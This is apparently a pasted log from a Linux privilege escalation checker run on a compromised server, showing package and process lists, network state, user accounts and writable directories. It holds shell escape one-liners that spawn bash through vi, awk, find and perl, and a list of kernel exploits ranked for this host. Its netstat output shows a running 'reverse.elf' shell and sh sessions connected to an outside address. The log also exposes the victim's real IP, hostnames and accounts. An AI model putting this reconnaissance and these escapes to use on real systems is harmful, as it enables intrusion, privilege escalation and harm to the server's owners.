  1802. perl-Net-SSLeay-1.55-4.el7.x86_64
  1803. perl-NetAddr-IP-4.069-3.el7.x86_64
  1804. perl-Package-Constants-0.02-291.el7.noarch
  1805. perl-PathTools-3.40-5.el7.x86_64
  1806. perl-PlRPC-0.2020-14.el7.noarch
  1807. perl-Pod-Escapes-1.04-291.el7.noarch
  1808. perl-Pod-Perldoc-3.20-4.el7.noarch
  1809. perl-Pod-Simple-3.28-4.el7.noarch
  1810. perl-Pod-Usage-1.63-3.el7.noarch
  1811. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  1812. perl-Socket-2.010-4.el7.x86_64
  1813. perl-Socket6-0.23-15.el7.x86_64
  1814. perl-Storable-2.45-3.el7.x86_64
  1815. perl-Switch-2.16-7.el7.noarch
  1816. perl-Sys-Syslog-0.33-3.el7.x86_64
  1817. perl-Test-Harness-3.28-3.el7.noarch
  1818. perl-Text-ParseWords-3.29-4.el7.noarch
  1819. perl-Time-HiRes-1.9725-3.el7.x86_64
  1820. perl-Time-Local-1.2300-2.el7.noarch
  1821. perl-TimeDate-2.30-2.el7.noarch
  1822. perl-URI-1.60-9.el7.noarch
  1823. perl-WWW-RobotRules-6.02-5.el7.noarch
  1824. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  1825. perl-XML-Parser-2.41-10.el7.x86_64
  1826. perl-XML-SAX-0.99-9.el7.noarch
  1827. perl-XML-SAX-Base-1.08-7.el7.noarch
  1828. perl-XML-Simple-2.20-5.el7.noarch
  1829. perl-constant-1.27-2.el7.noarch
  1830. perl-devel-5.16.3-291.el7.x86_64
  1831. perl-libs-5.16.3-291.el7.x86_64
  1832. perl-libwww-perl-6.05-2.el7.noarch
  1833. perl-macros-5.16.3-291.el7.x86_64
  1834. perl-parent-0.225-244.el7.noarch
  1835. perl-podlators-2.5.1-3.el7.noarch
  1836. perl-threads-1.87-4.el7.x86_64
  1837. perl-threads-shared-1.43-6.el7.x86_64
  1838. perl-version-0.99.07-2.el7.x86_64
  1839. root 426 Apr01 0:00 [xfs-cil/dm-1]
  1840. root 610 Apr01 0:00 [xfsaild/sda1]
  1841. root 1855 Apr01 1:41 /usr/libexec/postfix/master
  1842. root 113 Apr01 2:24 [kauditd]
  1843. root 31 Apr01 0:00 [kintegrityd]
  1844. root 16709 22:20 0:00 [kworker/1:2]
  1845. root 57 Apr01 0:00 [kmpath_rdacd]
  1846. root 47 Apr01 0:00 [crypto]
  1847. root 10 Apr01 2:25 [watchdog/0]
  1848. root 506 Apr01 94:55 /usr/lib/systemd/systemd-journald
  1849. root 404 Apr01 0:00 [bioset]
  1850. root 13777 Jul10 0:00 /usr/lib/systemd/systemd-udevd
  1851. root 46 Apr01 0:00 [fsnotify_mark]
  1852. root 605 Apr01 0:00 [xfs-conv/sda1]
  1853. root 9071 21:08 0:00 [kworker/u8:0]
  1854. root 297 Apr01 0:00 [mpt_poll_0]
  1855. root 608 Apr01 0:00 [xfs-log/sda1]
  1856. root 13 Apr01 10:43 [ksoftirqd/1]
  1857. root 20 Apr01 0:00 [kworker/2:0H]
  1858. root 298 Apr01 0:00 [mpt/0]
  1859. root 13725 Jul10 3:14 /usr/sbin/crond
  1860. root 422 Apr01 0:00 [xfs_mru_cache]
  1861. root 288 Apr01 0:00 [ata_sff]
  1862. root 946 Apr01 117:45 /usr/lib/vmware-caf/pme/bin/ManagementAgentHost
  1863. root 33 Apr01 0:00 [kblockd]
  1864. root 312 Apr01 0:00 [ttm_swap]
  1865. root 17570 Jul10 20:51 /usr/sbin/irqbalance
  1866. Possible Related Packages:
  1867. irqbalance-1.0.7-6.el7_3.1.x86_64
  1868. root 428 Apr01 0:00 [xfs-log/dm-1]
  1869. root 291 Apr01 0:00 [scsi_eh_0]
  1870. root 9 Apr01 250:48 [rcu_sched]
  1871.  
  1872. [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
  1873.  
  1874. [+] Installed Tools
  1875. /usr/bin/awk
  1876. /usr/bin/perl
  1877. /usr/bin/python
  1878. /usr/bin/ruby
  1879. /usr/bin/vi
  1880. /usr/bin/find
  1881. /usr/bin/nc
  1882. /usr/bin/wget
  1883.  
  1884. [+] Related Shell Escape Sequences...
  1885.  
  1886. vi--> :!bash
  1887. vi--> :set shell=/bin/bash:shell
  1888. awk--> awk 'BEGIN {system("/bin/bash")}'
  1889. find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
  1890. perl--> perl -e 'exec "/bin/bash";'
  1891.  
  1892. [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
  1893.  
  1894. Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
  1895.  
  1896. The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
  1897. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  1898.  
  1899. The following exploits are applicable to this kernel version and should be investigated as well
  1900. - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
  1901. - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
  1902. - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
  1903. - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
  1904. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  1905. - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
  1906. - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
  1907.  
  1908. Finished
  1909. ==================================================================================================================================================================================================
  1910. LINUX PRIVILEGE ESCALATION CHECKER
  1911. =================================================================================================
  1912.  
  1913. [*] GETTING BASIC SYSTEM INFO...
  1914.  
  1915. [+] Kernel
  1916. Linux version 3.10.0-514.10.2.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-11) (GCC) ) #1 SMP Fri Mar 3 00:04:05 UTC 2017
  1917.  
  1918. [+] Hostname
  1919. servertest
  1920.  
  1921. [+] Operating System
  1922. \S
  1923. Kernel \r on an \m
  1924.  
  1925. [*] GETTING NETWORKING INFO...
  1926.  
  1927. [+] Interfaces
  1928. ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  1929. inet 150.214.91.122 netmask 255.255.255.0 broadcast 150.214.91.255
  1930. inet6 fe80::250:56ff:fe84:41cb prefixlen 64 scopeid 0x20<link>
  1931. ether 00:50:56:84:41:cb txqueuelen 1000 (Ethernet)
  1932. RX packets 1758525162 bytes 237635980617 (221.3 GiB)
  1933. RX errors 0 dropped 229199 overruns 0 frame 0
  1934. TX packets 8562477403 bytes 22999852696631 (20.9 TiB)
  1935. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  1936. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  1937. inet 127.0.0.1 netmask 255.0.0.0
  1938. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  1939. loop txqueuelen 1 (Local Loopback)
  1940. RX packets 39811102 bytes 18998639641 (17.6 GiB)
  1941. RX errors 0 dropped 0 overruns 0 frame 0
  1942. TX packets 39811102 bytes 18998639641 (17.6 GiB)
  1943. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  1944.  
  1945. [+] Netstat
  1946. Active Internet connections (servers and established)
  1947. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  1948. tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
  1949. tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
  1950. tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
  1951. tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN -
  1952. tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 11713/nc
  1953. tcp 0 0 150.214.91.122:53 0.0.0.0:* LISTEN -
  1954. tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
  1955. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  1956. tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
  1957. tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
  1958. tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
  1959. tcp 0 0 0.0.0.0:20000 0.0.0.0:* LISTEN -
  1960. tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
  1961. tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN -
  1962. tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
  1963. tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
  1964. tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN -
  1965. tcp 961 0 150.214.91.122:40948 92.56.216.153:4445 CLOSE_WAIT 10469/sh
  1966. tcp 0 0 150.214.91.122:40980 92.56.216.153:4446 ESTABLISHED 10881/./reverse.elf
  1967. tcp 241 0 150.214.91.122:41044 92.56.216.153:4445 CLOSE_WAIT 10856/sh
  1968. tcp6 0 0 :::110 :::* LISTEN -
  1969. tcp6 0 0 :::111 :::* LISTEN -
  1970. tcp6 0 0 :::143 :::* LISTEN -
  1971. tcp6 0 0 :::80 :::* LISTEN -
  1972. tcp6 0 0 :::1234 :::* LISTEN 11713/nc
  1973. tcp6 0 0 :::21 :::* LISTEN -
  1974. tcp6 0 0 :::53 :::* LISTEN -
  1975. tcp6 0 0 :::22 :::* LISTEN -
  1976. tcp6 0 0 ::1:5432 :::* LISTEN -
  1977. tcp6 0 0 ::1:953 :::* LISTEN -
  1978. tcp6 0 0 :::25 :::* LISTEN -
  1979. tcp6 0 0 :::443 :::* LISTEN -
  1980. tcp6 0 0 :::993 :::* LISTEN -
  1981. tcp6 0 0 :::995 :::* LISTEN -
  1982. tcp6 0 0 :::587 :::* LISTEN -
  1983. tcp6 0 0 150.214.91.122:80 81.61.224.35:60494 ESTABLISHED -
  1984. tcp6 0 0 150.214.91.122:80 81.61.224.35:60496 ESTABLISHED -
  1985. tcp6 0 0 150.214.91.122:80 81.61.224.35:60497 ESTABLISHED -
  1986. tcp6 0 0 150.214.91.122:80 81.61.224.35:60493 ESTABLISHED -
  1987. tcp6 0 0 150.214.91.122:80 81.61.224.35:60495 ESTABLISHED -
  1988. tcp6 0 0 150.214.91.122:80 81.61.224.35:60498 ESTABLISHED -
  1989. udp 0 0 0.0.0.0:40069 0.0.0.0:* -
  1990. udp 0 0 0.0.0.0:20000 0.0.0.0:* -
  1991. udp 0 0 150.214.91.122:53 0.0.0.0:* -
  1992. udp 0 0 127.0.0.1:53 0.0.0.0:* -
  1993. udp 0 0 0.0.0.0:5353 0.0.0.0:* -
  1994. udp 0 0 0.0.0.0:10000 0.0.0.0:* -
  1995. udp6 0 0 ::1:48145 ::1:48145 ESTABLISHED -
  1996. udp6 0 0 :::53 :::* -
  1997.  
  1998. [+] Route
  1999. Kernel IP routing table
  2000. Destination Gateway Genmask Flags Metric Ref Use Iface
  2001. default gateway 0.0.0.0 UG 100 0 0 ens32
  2002. 150.214.91.0 0.0.0.0 255.255.255.0 U 100 0 0 ens32
  2003.  
  2004. [*] GETTING FILESYSTEM INFO...
  2005.  
  2006. [+] Mount results
  2007. /dev/mapper/centos-root on / type xfs (rw,relatime,attr2,inode64,noquota)
  2008. devtmpfs on /dev type devtmpfs (rw,nosuid,size=3994672k,nr_inodes=998668,mode=755)
  2009. tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
  2010. devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
  2011. hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
  2012. mqueue on /dev/mqueue type mqueue (rw,relatime)
  2013. proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
  2014. systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=32,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
  2015. binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
  2016. sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
  2017. securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
  2018. tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
  2019. cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
  2020. cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
  2021. cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
  2022. cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_prio,net_cls)
  2023. cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
  2024. cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
  2025. cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
  2026. cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
  2027. cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
  2028. cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
  2029. cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
  2030. pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
  2031. configfs on /sys/kernel/config type configfs (rw,relatime)
  2032. debugfs on /sys/kernel/debug type debugfs (rw,relatime)
  2033. tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
  2034. tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=801084k,mode=700)
  2035. /dev/sdb1 on /home type ext4 (rw,relatime,quota,usrquota,grpquota,data=ordered)
  2036. /dev/sda1 on /boot type xfs (rw,relatime,attr2,inode64,noquota)
  2037. /dev/mapper/centos-root on /tmp type xfs (rw,relatime,attr2,inode64,noquota)
  2038. /dev/mapper/centos-root on /var/tmp type xfs (rw,relatime,attr2,inode64,noquota)
  2039.  
  2040. [+] fstab entries
  2041. #
  2042. # /etc/fstab
  2043. # Created by anaconda on Thu Mar 5 09:25:05 2015
  2044. #
  2045. # Accessible filesystems, by reference, are maintained under '/dev/disk'
  2046. # See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
  2047. #
  2048. /dev/mapper/centos-root / xfs seclabel,inode64,relatime,attr2,grpquota,usrquota,rw 0 1
  2049. UUID=d6fe1c31-2352-43a4-ae6a-27db05987d1f /boot xfs defaults 1 2
  2050. /dev/mapper/centos-swap swap swap defaults 0 0
  2051. LABEL=/home /home ext4 usrquota,grpquota 0 2
  2052.  
  2053. [+] Scheduled cron jobs
  2054. -rw------- 1 root root 0 Mar 31 2016 /etc/cron.deny
  2055. -rw-r--r--. 1 root root 451 Jun 10 2014 /etc/crontab
  2056. /etc/cron.d:
  2057. total 28
  2058. drwxr-xr-x. 2 root root 70 Apr 1 2017 .
  2059. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  2060. -rw-r--r-- 1 root root 128 Mar 31 2016 0hourly
  2061. -rw------- 1 root root 203 Mar 30 2016 clamav-update
  2062. -rw-r--r-- 1 root root 2481 Apr 1 2017 mailman
  2063. -rw-r--r-- 1 root root 459 Jun 24 2015 sa-update
  2064. /etc/cron.daily:
  2065. total 28
  2066. drwxr-xr-x. 2 root root 72 Feb 27 2017 .
  2067. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  2068. -rwxr-xr-x 1 root root 211 Jan 12 2017 00webalizer
  2069. -rwx------ 1 root root 219 Nov 5 2016 logrotate
  2070. -rwxr-xr-x. 1 root root 618 Mar 17 2014 man-db.cron
  2071. -rwx------ 1 root root 208 Nov 4 2016 mlocate
  2072. /etc/cron.hourly:
  2073. total 20
  2074. drwxr-xr-x. 2 root root 35 Jan 19 2017 .
  2075. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  2076. -rwxr-xr-x 1 root root 392 Mar 31 2016 0anacron
  2077. -rwxr-x---. 1 root root 174 Mar 5 2015 awstats
  2078. /etc/cron.monthly:
  2079. total 12
  2080. drwxr-xr-x. 2 root root 6 Jun 10 2014 .
  2081. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  2082. /etc/cron.weekly:
  2083. total 12
  2084. drwxr-xr-x. 2 root root 6 Jun 10 2014 .
  2085. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  2086.  
  2087. [+] Writable cron dirs
  2088.  
  2089.  
  2090. [*] ENUMERATING USER AND ENVIRONMENTAL INFO...
  2091.  
  2092. [+] Logged in User Activity
  2093. 22:24:03 up 233 days, 21:59, 0 users, load average: 0.04, 0.21, 0.30
  2094. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  2095.  
  2096. [+] Super Users Found:
  2097. root
  2098.  
  2099. [+] Environment
  2100. USER=programacion
  2101. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
  2102. _=/usr/bin/env
  2103. PWD=/tmp
  2104. LANG=C
  2105. SHLVL=3
  2106. HOME=/home/servertest
  2107.  
  2108. [+] Root and current user history (depends on privs)
  2109. -rw------- 1 programacion programacion 1533 Nov 20 21:45 /home/servertest/.bash_history
  2110.  
  2111. [+] Sudoers (privileged)
  2112.  
  2113. [+] All users
  2114. root:x:0:0:root:/root:/bin/bash
  2115. bin:x:1:1:bin:/bin:/sbin/nologin
  2116. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2117. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2118. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2119. sync:x:5:0:sync:/sbin:/bin/sync
  2120. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2121. halt:x:7:0:halt:/sbin:/sbin/halt
  2122. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2123. operator:x:11:0:operator:/root:/sbin/nologin
  2124. games:x:12:100:games:/usr/games:/sbin/nologin
  2125. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2126. nobody:x:99:99:Nobody:/:/sbin/nologin
  2127. dbus:x:81:81:System message bus:/:/sbin/nologin
  2128. polkitd:x:999:998:User for polkitd:/:/sbin/nologin
  2129. avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
  2130. avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
  2131. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2132. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2133. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
  2134. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2135. mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
  2136. dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
  2137. dovenull:x:998:997:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
  2138. mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
  2139. postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
  2140. named:x:25:25:Named:/var/named:/sbin/nologin
  2141. saslauth:x:997:76:"Saslauthd user":/run/saslauthd:/sbin/nologin
  2142. clamupdate:x:996:996:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2143. clamscan:x:995:995:Clamav scanner user:/:/sbin/nologin
  2144. tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
  2145. epsalgeciras:x:508:508:Escuela Politecnica Superior de Algeciras:/home/epsalgeciras:/bin/sh
  2146. zabbix:x:506:3:Zabbix agents owner:/opt/zabbix:/bin/bash
  2147. imeymat:x:518:518:Instituto de Microscopía Electrónica y Materiales:/home/imeymat:/bin/sh
  2148. systemd-bus-proxy:x:505:506:systemd Bus Proxy:/:/sbin/nologin
  2149. systemd-network:x:504:505:systemd Network Management:/:/sbin/nologin
  2150. master:x:523:523::/home/master:/bin/sh
  2151. gradosindustriales:x:528:528:Grados Industriales:/home/gradosindustriales:/bin/sh
  2152. ccsociales:x:531:531:Clone of Centro UCA 1:/home/ccsociales:/bin/sh
  2153. ciencias:x:534:533:Web de Ciencias:/home/ciencias:/bin/sh
  2154. mario.ciencias:x:534:533:Mario:/home/ciencias/public_html:/bin/false
  2155. default:x:536:535:El servidor predeterminado:/home/default:/bin/sh
  2156. rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
  2157. iuila:x:539:538::/home/iuila:/bin/sh
  2158. enfyfis:x:541:540:Enfermería y Fisioterapia:/home/enfyfis:/bin/sh
  2159. indess:x:542:541::/home/indess:/bin/sh
  2160. caiv:x:543:542:Centro Andaluz de Investigaciones Vitivinícolas:/home/caiv:/bin/sh
  2161. epsalgeciras1:x:547:546:Clone of Escuela Politecnica Superior de Algeciras:/home/epsalgeciras1:/bin/sh
  2162. economicas:x:550:549:Facultad de Ciencias Económicas y Empresariales:/home/economicas:/bin/sh
  2163. programacion:x:553:552::/home/servertest:/bin/sh
  2164. servertest:x:1000:552::/home/servertest:/bin/bash
  2165. masingind:x:556:554::/home/masingind:/bin/sh
  2166.  
  2167. [+] Current User
  2168. programacion
  2169.  
  2170. [+] Current User ID
  2171. uid=553(programacion) gid=552(programacion) groups=552(programacion)
  2172.  
  2173. [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
  2174.  
  2175. [+] World Writeable Directories for User/Group 'Root'
  2176. drwxrwxrwt 2 root root 40 Apr 1 2017 /dev/mqueue
  2177. drwxrwxrwt 2 root root 40 Apr 1 2017 /dev/shm
  2178. drwxrwxrwt 2 root root 4096 Nov 20 22:24 /tmp
  2179. drwxrwxrwt 2 root root 6 Oct 27 08:41 /var/tmp
  2180. drwxrwxrwt 2 root root 4096 Mar 5 2015 /home/virtualmin-autoreply
  2181.  
  2182. [+] World Writeable Directories for Users other than Root
  2183. drwxrwxrwx 2 programacion programacion 4096 Jul 7 22:07 /home/servertest/public_html/.tmb
  2184. drwxrwxrwx 2 programacion programacion 4096 Oct 1 2014 /home/servertest/public_html/wp-content/backup-db
  2185. drwxrwxrwx 4 programacion programacion 4096 Sep 11 09:44 /home/servertest/public_html/wp-content/uploads/filebase
  2186. drwxrwxrwx 2 programacion programacion 4096 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/.tmp
  2187. drwxrwxrwx 2 programacion programacion 4096 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes
  2188. drwxrwxrwx 2 programacion programacion 4096 Nov 3 2014 /home/servertest/public_html/wp-content/uploads/backwpup-8adfde-logs
  2189.  
  2190. [+] World Writable Files
  2191. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/hugetlb/cgroup.event_control
  2192. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/user.slice/cgroup.event_control
  2193. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/dovecot.service/cgroup.event_control
  2194. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/webmin.service/cgroup.event_control
  2195. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/postfix.service/cgroup.event_control
  2196. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/rsyslog.service/cgroup.event_control
  2197. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/mailman.service/cgroup.event_control
  2198. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/postgresql.service/cgroup.event_control
  2199. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/system-getty.slice/cgroup.event_control
  2200. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/NetworkManager.service/cgroup.event_control
  2201. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/systemd-logind.service/cgroup.event_control
  2202. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/dbus.service/cgroup.event_control
  2203. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/saslauthd.service/cgroup.event_control
  2204. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/vmware-tools.service/cgroup.event_control
  2205. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/avahi-daemon.service/cgroup.event_control
  2206. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/auditd.service/cgroup.event_control
  2207. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/systemd-journald.service/cgroup.event_control
  2208. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/cgroup.event_control
  2209. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/cgroup.event_control
  2210. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/perf_event/cgroup.event_control
  2211. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/memory/cgroup.event_control
  2212. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/cpuset/cgroup.event_control
  2213. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/blkio/cgroup.event_control
  2214. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/freezer/cgroup.event_control
  2215. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/net_cls,net_prio/cgroup.event_control
  2216. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/cpu,cpuacct/cgroup.event_control
  2217. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/pids/cgroup.event_control
  2218. --w--w--w- 1 root root 0 Nov 20 21:00 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-150671.scope/cgroup.event_control
  2219. --w--w--w- 1 root root 0 Sep 8 11:23 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-103530.scope/cgroup.event_control
  2220. --w--w--w- 1 root root 0 Jul 10 11:40 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-64611.scope/cgroup.event_control
  2221. --w--w--w- 1 root root 0 Jul 6 11:52 /sys/fs/cgroup/systemd/user.slice/user-0.slice/cgroup.event_control
  2222. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/user.slice/cgroup.event_control
  2223. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/httpd.service/cgroup.event_control
  2224. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/mariadb.service/cgroup.event_control
  2225. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/sshd.service/cgroup.event_control
  2226. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/irqbalance.service/cgroup.event_control
  2227. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/proftpd.service/cgroup.event_control
  2228. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/firewalld.service/cgroup.event_control
  2229. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/tuned.service/cgroup.event_control
  2230. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/polkit.service/cgroup.event_control
  2231. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/named.service/cgroup.event_control
  2232. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/usermin.service/cgroup.event_control
  2233. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/lvm2-lvmetad.service/cgroup.event_control
  2234. --w--w--w- 1 root root 0 Jul 10 09:18 /sys/fs/cgroup/systemd/system.slice/systemd-udevd.service/cgroup.event_control
  2235. --w--w--w- 1 root root 0 Jul 10 09:18 /sys/fs/cgroup/systemd/system.slice/crond.service/cgroup.event_control
  2236. --w--w--w- 1 root root 0 Jul 6 11:54 /sys/fs/cgroup/systemd/system.slice/run-user-0.mount/cgroup.event_control
  2237. --w--w--w- 1 root root 0 Jun 19 11:50 /sys/fs/cgroup/systemd/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
  2238. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/kdump.service/cgroup.event_control
  2239. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/zabbix.service/cgroup.event_control
